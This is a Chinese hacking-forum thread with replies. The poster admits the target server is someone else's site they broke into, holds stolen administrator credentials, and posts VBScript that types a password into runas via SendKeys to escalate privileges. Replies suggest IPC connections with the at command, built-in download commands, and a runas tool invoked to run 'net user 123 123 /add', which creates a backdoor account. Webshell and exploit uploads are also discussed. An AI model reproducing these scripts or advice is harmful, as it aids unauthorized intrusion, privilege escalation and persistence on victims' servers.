探讨windows系统下的runas命令提权
我这里有个目标机器,在我装vpn服务时导致服务器的80、3389端口无法访问,有个443端口可以访问并且可以执行cmd命令,但是权限很低,我之前已经获取了该服务器的管理员帐号和密码,现在想通过命令“shutdown /r /t 0”让目标机器重启看看能不能恢复,但是由于权限不够无法执行shutdown,于是我想到了linux的sudo命令,百度了一下,windows也有类似的runas命令,但是需要交互输入管理员的帐号和密码,网上也找了一堆脚本,例如
dim WshShell,cmd
cmd="%SystemRoot%\system32\cmd.exe"
Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.Run cmd
WScript.Sleep 1000
WshShell.SendKeys"runas /user:admin whoami{ENTER}"
WScript.Sleep 2000
WshShell.SendKeys"zxcv1234"
WScript.Sleep 2000
WshShell.SendKeys"{ENTER}"
各位大表哥,求教了。
更新:
利用如下脚本本地测试成功了:
Set objNet = createobject("Wscript.Network")
set ws=createobject("wscript.shell")
wscript.sleep 1000
ws.run "cmd.exe"
wscript.sleep 1000
ws.SendKeys"runas /user:aaa "
wscript.sleep 1000
ws.SendKeys chr(34)
ws.SendKeys"cmd"
ws.SendKeys chr(34)
wscript.sleep 1000
ws.SendKeys"{ENTER}"
wscript.sleep 1000
ws.SendKeys "q"
wscript.sleep 100
ws.SendKeys "w"
wscript.sleep 100
ws.SendKeys "e"
wscript.sleep 100
ws.SendKeys "r"
wscript.sleep 100
ws.SendKeys "_"
wscript.sleep 100
ws.SendKeys "1"
wscript.sleep 100
ws.SendKeys "2"
wscript.sleep 100
ws.SendKeys "3"
wscript.sleep 100
ws.SendKeys "4"
wscript.sleep 100
ws.SendKeys "5"
wscript.sleep 100
ws.SendKeys "6"
wscript.sleep 100
ws.SendKeys "7"
wscript.sleep 100
ws.SendKeys "8"
wscript.sleep 100
ws.SendKeys "9"
wscript.sleep 1000
ws.SendKeys "{ENTER}"
以上脚本本地虚拟机测试正常,为什么在腾讯云服务器会无限弹窗cmd呢,求哪位大神告知。
评论11次
你有shell吗?有shell直接ipc连接,然后用at命令重启目标机器
据说有的服务器是不支持vpn的 建议你问下服务商 哈哈
这是我日的别人的站,怎么问服务商
尴尬 好吧
powershell的权限控制很好
据说有的服务器是不支持vpn的 建议你问下服务商 哈哈
这是我日的别人的站,怎么问服务商
你不是之前有捉到管理的密码吗WIN自带下载命令https://www.t00ls.com/thread-41199-1-1.html再配合2L的那个工具。
老哥,现在是目标机无法访问任何网站,所以说下载是不可能的,ftp,vbs我都尝试了,最开始拿到服务器权限用的vbs,然后装VPN之后出毛病了,开始3389,80都是能直接访问的,现在就一个443还能访问,我也不知道什么原因,三观快被它颠覆了
据说有的服务器是不支持vpn的 建议你问下服务商 哈哈
这是我日的别人的站,怎么问服务商
你不是之前有捉到管理的密码吗 WIN自带下载命令 https://www.t00ls.com/thread-41199-1-1.html 再配合2L的那个工具。
https://www.t00ls.com/viewthread.php?tid=38386&highlight=runas S_RA.txt (20 KB) 下载次数: 322017-2-28 17:16s_ra.txt administrator 密码 "net user 123 123 /add"
问题是我现在任何文件都穿不上去,只能写入文本类型的,目标机现在ping任何IP都返回General failure,访问不了别的网站,不然我直接vbs下载一个提权exp就行了。这个看着是txt,应该是个exe程序吧,这个网站是aspx连同同名称下还有一个cs文件的程序,一般的aspx都报错,asp返回文件找不到,利用菜刀,小马上传基本没xi。
据说有的服务器是不支持vpn的 建议你问下服务商 哈哈
这是我日的别人的站,怎么问服务商
runas可以操作远程计算机吗
还没在目标机测试,想现在本地测试成功了再去弄
据说有的服务器是不支持vpn的 建议你问下服务商 哈哈
runas可以操作远程计算机吗
https://www.t00ls.com/viewthread.php?tid=38386&highlight=runas S_RA.txt (20 KB) 下载次数: 32 2017-2-28 17:16 s_ra.txt administrator 密码 "net user 123 123 /add"